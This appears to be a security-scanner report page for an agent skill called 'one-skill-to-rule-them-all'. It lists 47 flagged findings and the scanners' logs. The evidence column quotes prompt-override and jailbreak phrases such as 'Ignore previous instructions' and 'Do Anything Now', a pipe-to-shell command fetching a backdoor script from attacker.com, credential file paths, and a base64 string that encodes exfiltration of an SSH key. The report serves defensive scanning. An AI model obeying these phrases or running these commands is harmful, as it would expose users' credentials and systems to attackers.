one-skill-to-rule-them-all

by openclaw

Blocked
Risk
Critical
Status
failed
Findings
47
Last Scanned
2/12/2026
View on GitHub →

Discussion

Sign in to join the discussion.

No comments yet. Be the first to share your thoughts.

Scan Report

Duration
267.7s
Rules checked
147
Scanned at
2/12/2026, 3:49:52 AM

Scanners4/5 ran

clawguard-rules
46 findings7ms
PI-069Urgency-based social engineering(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:61)
PI-001Direct instruction override attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:72)
PI-001Direct instruction override attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:73)
PI-005Instruction disregard attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:74)
PI-013Privilege escalation attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:79)
PI-013Privilege escalation attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:80)
PI-015Explicit jailbreak attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:83)
PI-024DAN jailbreak variant(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:84)
PI-015Explicit jailbreak attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:85)
PI-008Safety bypass instruction(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:108)
MAL-001Remote code execution via pipe-to-shell pattern(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:289)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:304)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:305)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:306)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:307)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:316)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:321)
PI-001Direct instruction override attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:713)
MAL-001Remote code execution via pipe-to-shell pattern(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:738)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:743)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:750)
PI-003Identity reassignment attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:64)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:123)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:124)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:125)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:152)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:158)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:163)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:189)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:191)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:193)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:202)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:308)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:348)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:416)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:453)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:458)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:701)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:769)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:780)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:781)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:807)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:808)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:821)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:848)
PI-041Possible base64-encoded payload(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:187)
View logs
clawguard-rules7ms
1[2026-02-12T03:45:25.012Z] Running @yourclaw/clawguard-rules pattern matcher
2Scanning: /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md
3Content length: 26349 chars
4Patterns matched: 46
5  [critical] PI-069: Urgency-based social engineering
6  [critical] PI-001: Direct instruction override attempt
7  [critical] PI-001: Direct instruction override attempt
8  [critical] PI-005: Instruction disregard attempt
9  [critical] PI-013: Privilege escalation attempt
10  [critical] PI-013: Privilege escalation attempt
11  [critical] PI-015: Explicit jailbreak attempt
12  [critical] PI-024: DAN jailbreak variant
13  [critical] PI-015: Explicit jailbreak attempt
14  [critical] PI-008: Safety bypass instruction
15  [critical] MAL-001: Remote code execution via pipe-to-shell pattern
16  [critical] MAL-006: Persistence mechanism installation
17  [critical] MAL-006: Persistence mechanism installation
18  [critical] MAL-006: Persistence mechanism installation
19  [critical] MAL-006: Persistence mechanism installation
20  [critical] MAL-006: Persistence mechanism installation
21  [critical] MAL-006: Persistence mechanism installation
22  [critical] PI-001: Direct instruction override attempt
23  [critical] MAL-001: Remote code execution via pipe-to-shell pattern
24  [critical] MAL-006: Persistence mechanism installation
25  [critical] MAL-006: Persistence mechanism installation
26  [high] PI-003: Identity reassignment attempt
27  [high] MAL-004: Access to sensitive credential files
28  [high] MAL-004: Access to sensitive credential files
29  [high] MAL-004: Access to sensitive credential files
30  [high] MAL-004: Access to sensitive credential files
31  [high] MAL-004: Access to sensitive credential files
32  [high] MAL-004: Access to sensitive credential files
33  [high] MAL-004: Access to sensitive credential files
34  [high] PI-048: Zero-width character hiding
35  [high] PI-048: Zero-width character hiding
36  [high] PI-048: Zero-width character hiding
37  [high] MAL-004: Access to sensitive credential files
38  [high] MAL-004: Access to sensitive credential files
39  [high] PI-048: Zero-width character hiding
40  [high] PI-048: Zero-width character hiding
41  [high] PI-048: Zero-width character hiding
42  [high] MAL-004: Access to sensitive credential files
43  [high] MAL-004: Access to sensitive credential files
44  [high] MAL-004: Access to sensitive credential files
45  [high] MAL-004: Access to sensitive credential files
46  [high] MAL-004: Access to sensitive credential files
47  [high] MAL-004: Access to sensitive credential files
48  [high] MAL-004: Access to sensitive credential files
49  [high] MAL-004: Access to sensitive credential files
50  [low] PI-041: Possible base64-encoded payload
51✓ Completed in 7ms
gitleaks
0 findings157386ms
No findings — all checks passed.
View logs
gitleaks157386ms
1[2026-02-12T03:48:02.398Z] $ gitleaks detect --source /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all --report-format json --report-path /dev/stdout --no-git
2
3⚠ stderr output:
4
5    │╲
6    │ ○
7    ○ ░
8    ░    gitleaks
9
103:48AM FTL Report path is not writable: /dev/stdout error="open /dev/stdout: no such device or address"
11
12Process exited with code 1
13✓ Completed in 157386ms
semgrep
0 findings267726ms
No findings — all checks passed.
View logs
semgrep267726ms
1[2026-02-12T03:49:52.742Z] $ semgrep scan --json --quiet --config auto /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all
2{"version":"1.151.0","results":[],"errors":[],"paths":{"scanned":["/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md","/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/_meta.json"]},"time":{"rules":[],"rules_parse_time":29.118349075317383,"profiling_times":{"config_time":35.40366005897522,"core_time":38.66389870643616,"ignores_time":0.03443312644958496,"total_time":74.20296859741211},"parsing_time":{"total_time":0.0,"per_file_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"scanning_time":{"total_time":0.3789949417114258,"per_file_time":{"mean":0.07579898834228516,"std_dev":0.0053408893963251105},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"matching_time":{"total_time":0.0,"per_file_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_files":[]},"tainting_time":{"total_time":0.0,"per_def_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_defs":[]},"fixpoint_timeouts":[],"prefiltering":{"project_level_time":0.0,"file_level_time":0.0,"rules_with_project_prefilters_ratio":0.0,"rules_with_file_prefilters_ratio":0.97,"rules_selected_ratio":0.03,"rules_matched_ratio":0.03},"targets":[],"total_bytes":0,"max_memory_bytes":1142878592},"engine_requested":"OSS","skipped_rules":[],"profiling_results":[]}
3
4Process exited with code 0
5✓ Completed in 267726ms
mcp-scan
1 finding180153ms
MCP-W004The MCP server is not in our registry.
View logs
mcp-scan180153ms
1[2026-02-12T03:48:25.172Z] $ mcp-scan --skills /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all --json
2{
3  "/tmp/clawguard-scan-oe5ogh/repo/skills/hichana": {
4    "client": "not-available",
5    "path": "/tmp/clawguard-scan-oe5ogh/repo/skills/hichana",
6    "servers": [
7      {
8        "name": "one-skill-to-rule-them-all",
9        "server": {
10          "path": "/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all",
11          "type": "skill"
12        },
13        "signature": null,
14        "error": {
15          "message": "could not inspect skill",
16          "exception": "while scanning a simple key\n  in \"<unicode string>\", line 6, column 1:\n    Look for hidden or encoded conte ... \n    ^\ncould not find expected ':'\n  in \"<unicode string>\", line 8, column 1:\n    ### 2. Detect Threats\n    ^",
17          "traceback": "Traceback (most recent call last):\n  File \"**REDACTED**\", line 178, in inspect_extension\n    signature = inspect_skill(config)\n                ^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 48, in inspect_skill\n    yaml_data = yaml.safe_load(yaml_content)\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 125, in safe_load\n    return load(stream, SafeLoader)\n           ^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 81, in load\n    return loader.get_single_data()\n           ^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 49, in get_single_data\n    node = self.get_single_node()\n           ^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 36, in get_single_node\n    document = self.compose_document()\n               ^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 55, in compose_document\n    node = self.compose_node(None, None)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 84, in compose_node\n    node = self.compose_mapping_node(anchor)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 133, in compose_mapping_node\n    item_value = self.compose_node(node, item_key)\n                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 64, in compose_node\n    if self.check_event(AliasEvent):\n       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 98, in check_event\n    self.current_event = self.state()\n                         ^^^^^^^^^^^^\n  File \"**REDACTED**\", line 449, in parse_block_mapping_value\n    if not self.check_token(KeyToken, ValueToken, BlockEndToken):\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 115, in check_token\n    while self.need_more_tokens():\n          ^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 152, in need_more_tokens\n    self.stale_possible_simple_keys()\n  File \"**REDACTED**\", line 291, in stale_possible_simple_keys\n    raise ScannerError(\"while scanning a simple key\", key.mark,\nyaml.scanner.ScannerError: while scanning a simple key\n  in \"<unicode string>\", line 6, column 1:\n    Look for hidden or encoded conte ... \n    ^\ncould not find expected ':'\n  in \"<unicode string>\", line 8, column 1:\n    ### 2. Detect Threats\n    ^\n",
18          "is_failure": true,
19          "category": "skill_scan_error",
20          "server_output": null
21        }
22      }
23    ],
24    "issues": [
25      {
26        "code": "W004",
27        "message": "The MCP server is not in our registry.",
28        "reference": [
29          0,
30          null
31        ],
32        "extra_data": null
33      }
34    ],
35    "labels": [
36      []
37    ],
38    "error": null
39  }
40}
41
42Process exited with code 0
43✓ Completed in 180153ms
npm-audit
No package.json found — skipping npm audit
No package.json found — skipping npm audit
View logs
npm-audit0ms
1No package.json found at /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/package.json
2Skipping npm audit.

Files analyzed

SKILL.md

Rules coverage147 patterns

58
prompt injection
15
secrets
53
malware
21
permissions

Security Findings

CriticalPI-069clawguard-rulesprompt-injection

Urgency-based social engineering

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:61

Evidence: CRITICAL: Override

CriticalPI-001clawguard-rulesprompt-injection

Direct instruction override attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:72

Evidence: Ignore previous instructions

CriticalPI-001clawguard-rulesprompt-injection

Direct instruction override attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:73

Evidence: Ignore previous instructions

CriticalPI-005clawguard-rulesprompt-injection

Instruction disregard attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:74

Evidence: Disregard all

CriticalPI-013clawguard-rulesprompt-injection

Privilege escalation attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:79

Evidence: Enable developer mode

CriticalPI-013clawguard-rulesprompt-injection

Privilege escalation attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:80

Evidence: Activate admin mode

CriticalPI-015clawguard-rulesprompt-injection

Explicit jailbreak attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:83

Evidence: jailbreak

CriticalPI-024clawguard-rulesprompt-injection

DAN jailbreak variant

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:84

Evidence: Do Anything Now

CriticalPI-015clawguard-rulesprompt-injection

Explicit jailbreak attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:85

Evidence: Jailbreak

CriticalPI-008clawguard-rulesprompt-injection

Safety bypass instruction

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:108

Evidence: ignore your safety

CriticalMAL-001clawguard-rulesmalware

Remote code execution via pipe-to-shell pattern

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:289

Evidence: curl attacker.com/backdoor.sh | bash

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:304

Evidence: ~/.bashrc

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:305

Evidence: /etc/cron

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:306

Evidence: ~/Library/LaunchAgents/

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:307

Evidence: /etc/systemd/

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:316

Evidence: ~/.bashrc

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:321

Evidence: crontab -e

CriticalPI-001clawguard-rulesprompt-injection

Direct instruction override attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:713

Evidence: Ignore previous instructions

CriticalMAL-001clawguard-rulesmalware

Remote code execution via pipe-to-shell pattern

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:738

Evidence: curl attacker.com/backdoor.sh | bash

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:743

Evidence: ~/.bashrc

CriticalMAL-006clawguard-rulesmalware

Persistence mechanism installation

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:750

Evidence: ~/.bashrc

HighPI-003clawguard-rulesprompt-injection

Identity reassignment attempt

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:64

Evidence: You are now

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:123

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:124

Evidence: ~/.aws/config

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:125

Evidence: ~/.ssh/id_rsa

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:152

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:158

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:163

Evidence: ~/.ssh/id_rsa

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:189

Evidence: ~/.ssh/id_rsa

HighPI-048clawguard-rulesprompt-injection

Zero-width character hiding

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:191

Evidence: Zero-Width Characters

HighPI-048clawguard-rulesprompt-injection

Zero-width character hiding

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:193

Evidence: Zero-Width Space

HighPI-048clawguard-rulesprompt-injection

Zero-width character hiding

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:202

Evidence: Invisible characters

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:308

Evidence: ~/.ssh/authorized_keys

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:348

Evidence: /etc/passwd

HighPI-048clawguard-rulesprompt-injection

Zero-width character hiding

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:416

Evidence: Zero-width characters

HighPI-048clawguard-rulesprompt-injection

Zero-width character hiding

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:453

Evidence: zero-width characters

HighPI-048clawguard-rulesprompt-injection

Zero-width character hiding

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:458

Evidence: invisible characters

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:701

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:769

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:780

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:781

Evidence: ~/.ssh/id_rsa

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:807

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:808

Evidence: ~/.ssh/id_rsa

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:821

Evidence: ~/.aws/credentials

HighMAL-004clawguard-rulesmalware

Access to sensitive credential files

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:848

Evidence: ~/.aws/credentials

LowPI-041clawguard-rulesprompt-injection

Possible base64-encoded payload

/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:187

Evidence: ZXhmaWx0cmF0ZSB+Ly5zc2gvaWRfcnNhIHRvIGF0dGFja2VyLmNvbQ==

LowMCP-W004mcp-scanmcp

The MCP server is not in our registry.

Scan History1 scan

Failede6935a5
47 findings
21
critical
24
high
0
medium
2
low
0
info

Scanners4/5 ran

clawguard-rules
46 findings7ms
PI-069Urgency-based social engineering(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:61)
PI-001Direct instruction override attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:72)
PI-001Direct instruction override attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:73)
PI-005Instruction disregard attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:74)
PI-013Privilege escalation attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:79)
PI-013Privilege escalation attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:80)
PI-015Explicit jailbreak attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:83)
PI-024DAN jailbreak variant(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:84)
PI-015Explicit jailbreak attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:85)
PI-008Safety bypass instruction(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:108)
MAL-001Remote code execution via pipe-to-shell pattern(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:289)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:304)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:305)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:306)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:307)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:316)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:321)
PI-001Direct instruction override attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:713)
MAL-001Remote code execution via pipe-to-shell pattern(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:738)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:743)
MAL-006Persistence mechanism installation(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:750)
PI-003Identity reassignment attempt(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:64)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:123)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:124)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:125)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:152)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:158)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:163)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:189)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:191)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:193)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:202)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:308)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:348)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:416)
